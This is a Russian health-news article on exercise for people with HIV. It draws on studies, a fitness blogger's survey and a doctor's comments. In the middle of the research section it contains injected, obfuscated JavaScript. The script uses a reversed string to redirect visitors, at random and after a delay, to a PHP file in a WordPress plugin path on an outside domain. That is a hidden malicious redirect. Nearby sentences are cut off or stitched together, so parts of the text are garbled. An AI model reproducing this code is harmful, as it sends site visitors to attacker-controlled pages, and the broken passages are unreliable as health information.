Можно стать марафонцем, но есть нюансы: самое важное о занятиях спортом при ВИЧ

Тренироваться или нет, а если тренироваться, то как? Врачи говорят, что рекомендации для людей, живущих с ВИЧ, те же, что и для остальных. При этом современные клинические исследования показывают, что тренировки могут положительно влиять на здоровье ВИЧ-положительных людей, но на практике все оказывается сложнее, чем в экспериментах ученых. «СПИД.ЦЕНТР» выяснил, что о спорте и ВИЧ говорит доказательная медицина, а также поговорил с блогером и фитнес-тренером из Петербурга, которая провела собственное небольшое исследование на эту тему.

«В большинстве случаев у человека с ВИЧ, принимающего антиретровирусную терапию, нет отличий от человека без ВИЧ», — считает врач-инфекционист Антон Еремин. Основные рекомендации для людей с ВИЧ, которые хотят начать тренироваться, практически не отличаются от таких же рекомендаций для людей без ВИЧ.

Самое существенное отличие заключается в том, что ВИЧ-положительным людям  стоит избегать выматывающих тренировок. Это связано с тем, что быстрая утомляемость — один из симптомов болезни, который может усилиться при слишком сильных нагрузках.

О чем говорят исследования

На сегодняшний день ученые не сомневаются в том, что умеренные тренировки безопасны — это признает, например, Международная федерация спортивной медицины в своем$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and Sports. Занятия спортом положительно влияют на ментальное и физическое здоровье, но при тренировках обязательно нужно учитывать наличие хронических и сопутствующих болезней.

В 2017 году немецкие ученые провели исследование, показавшее безопасность тренировок по марафонскому бегу для ВИЧ-положительных людей. Из 21 участника 13 успешно завершили тренировки по индивидуально разработанным программам. Результаты эксперимента показали повышение среднего количества клеток CD4 c 645 до 740, но величина выборки участников не позволяет точно сказать, связано ли это улучшение с результатом программы или с приемом антиретровирусных препаратов. Тем не менее состояние здоровья участников эксперимента не ухудшилось — это показывает безопасность правильно составленных тренировок.

C чем при ВИЧ помогает бороться спорт

Депрессия

Люди с ВИЧ часто страдают от депрессии, тревожного расстройства и посттравматического стрессового расстройства. На их состояние положительно влияют физические упражнения, которые не только укрепляют иммунную систему, но и повышают уровень окситоцина. Благодаря этому эффекту тренировки могут быть включены в комплексное лечение депрессии.

Диабет второго типа

Раньше ученые отмечали склонность людей с ВИЧ к истощению, но на сегодняшний день тенденция изменилась. Современные исследования показывают, что ВИЧ-положительные люди чаще склонны к ожирению, что вместе с приемом антиретровирусных препаратов повышает риск развития диабета второго типа.

В 2019 году в Лондоне был проведен шестимесячный исследованию 2019 года, занятия спортом в сочетании с приемом статинов — препаратов, снижающих уровень холестерина, — улучшают физическое состояния людей с ВИЧ и дислипидемией (нарушением липидного обмена в крови). При дислипидемии увеличивается риск развития сердечно-сосудистых заболеваний. Наибольший эффект дает комплексное лечение, но и сама по себе физическая нагрузка тоже оказывает положительное влияние.

по теме

общество

«Я приняла бы наркотик, даже если бы знала, что в нем ВИЧ»: история TikTok-блогера из Владивостока

О чем говорит опыт людей с ВИЧ

Яна Бельчегешева — фитнес-тренер и автор блога https://instagram.com/yanahivkonsultant?r=nametag  о своей жизни с ВИЧ. Несколько лет Яна не знала о своем статусе, усиленно занималась в зале, работала тренером и в целом вела активный образ жизни. Впервые ее самочувствие ухудшилось после начала антиретровирусной терапии — появились побочные эффекты, из-за которых она могла тренироваться только вечером, перед приемом лекарств.

Потом ухудшилось общее физическое состояние: тахикардия, повышенное давление и усталость мешали тренироваться так же активно, как и раньше. В своем Instagram Яна пишет, что занимается сейчас намного меньше — и по времени, и по нагрузкам, при этом она считает умеренные тренировки полезными для себя. Когда девушка заметила ухудшение своего состояния во время тренировок, она решила выяснить, насколько этот эффект распространен среди других людей с ВИЧ, занимающихся спортом.

В своем блоге Яна проводит опрос https://instagram.com/yanahivkonsultant?r=nametag«Спорт при ВИЧ». Участникам предлагается ответить на вопросы о том, каким видом спорта они занимаются и как часто, по какой схеме принимают терапию, есть ли у них сопутствующие заболевания, изменились ли их самочувствие и конституция тела.

На данный момент в опросе поучаствовали 24 человека. Все они принимают разные схемы антиретровирусной терапии и имеют неопределяемую вирусную нагрузку. 65 % участников принимают схему с долутегравиром, остальные — с Калетрой, Дарунавиром / Ритонавиром, Эфавирензом. 70 % опрошенных занимаются в тренажерном зале. Подавляющее большинство участников опроса рассказали про снижение выносливости после начала приема лекарств. Теперь после тренировки им требуется больше времени для восстановления. 35 % опрошенных не могут набрать прежнюю мышечную массу, в том числе из-за снижения аппетита.

При этом респонденты отмечают и положительные стороны тренировок: повышается тонус и выносливость организма, в лучшую сторону меняется конституция тела (по сравнению с полным отсутствием тренировок), занятия спортом дают заряд энергии, а 10 % опрошенных чувствуют себя так же хорошо, как и раньше. Общий вывод из мини-исследования такой: лучше заниматься спортом, чем не заниматься, но результаты у большинства стали хуже, чем до постановки диагноза и начала приема лекарств.

Врач-инфекционист Антон Еремин считает, что ухудшение результатов может быть связано не с самой болезнью, а с неправильно подобранной схемой терапии. «Если иммунитет не был исходно снижен, ВИЧ-инфекция не прогрессировала, то начало АРТ не должно влиять на переносимость физических нагрузок. Если заниматься спортом стало сложнее, то необходимо уточнить, насколько хорошо переносится назначенная схема АРТ, а также исключить наличие вторичных заболеваний».

Несмотря на то, что спортивные показатели у многих становятся хуже именно после начала приема лекарств, Яна подчеркивает: «Я бы не хотела, чтобы это было пропагандой против терапии. Я всеми руками и ногами “за” нее».

Что в итоге

В целом рекомендации для людей с ВИЧ и людей без ВИЧ похожи. И тем и другим советуют обратиться к врачу до начала тренировок и узнать, не помешают ли возможные хронические заболевания, травмы и их последствия заниматься спортом.

Люди с ВИЧ, которые имеют неопределяемую вирусную нагрузку и близкий к норме иммунный статус, не имеют прямых противопоказаний к тренировкам. Начинать лучше всего с коротких занятий и постепенно увеличивать их длительность.

Быстрая утомляемость — один из симптомов ВИЧ, поэтому ВИЧ-положительным людям стоит избегать выматывающих тренировок. При этом занятия спортом оказывают серьезный положительный эффект на физическое и психологическое состояние, помогают бороться с некоторыми ВИЧ-ассоциированными болезнями или предотвратить их.

Важно помнить, что если иммунитет не снижен и ВИЧ не прогрессировал, плохое самочувствие при занятиях спортом может быть связано с неправильно подобранной схемой лечения и сопутствующими болезнями.

Подписывайтесь на канал